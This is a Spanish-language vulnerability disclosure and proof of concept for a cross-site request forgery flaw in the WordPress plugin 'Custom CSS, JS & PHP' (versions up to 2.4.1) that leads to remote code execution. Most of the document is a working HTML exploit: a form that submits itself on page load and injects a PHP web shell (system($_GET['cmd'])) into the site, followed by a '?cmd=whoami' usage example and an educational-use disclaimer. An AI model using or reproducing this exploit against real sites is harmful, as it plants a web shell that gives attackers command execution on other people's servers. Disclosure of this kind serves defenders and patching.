
Plugin de WordPress Custom CSS, JS & PHP <= 2.4.1 - Vulnerabilidad de CSRF a RCE
Una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el plugin WPFactory Custom CSS, JS & PHP permite la ejecución remota de código (RCE) mediante la inyección de código PHP malicioso a través de solicitudes POST no autorizadas.
Esto afecta a todas las versiones hasta la 2.4.1 inclusive.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HA continuación se muestra una captura de pantalla con el resultado de una explotación exitosa, demostrando cómo se puede ejecutar código remoto mediante el parámetro de la URL:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded.http://target-site.com/?cmd=whoami
Este PoC es solo con fines educativos.
El autor no se hace responsable de ningún uso indebido o daño causado por la aplicación inadecuada de esta información.
Prueba siempre en entornos controlados y con permiso.
Por: Nxploited | Khaled Alenazi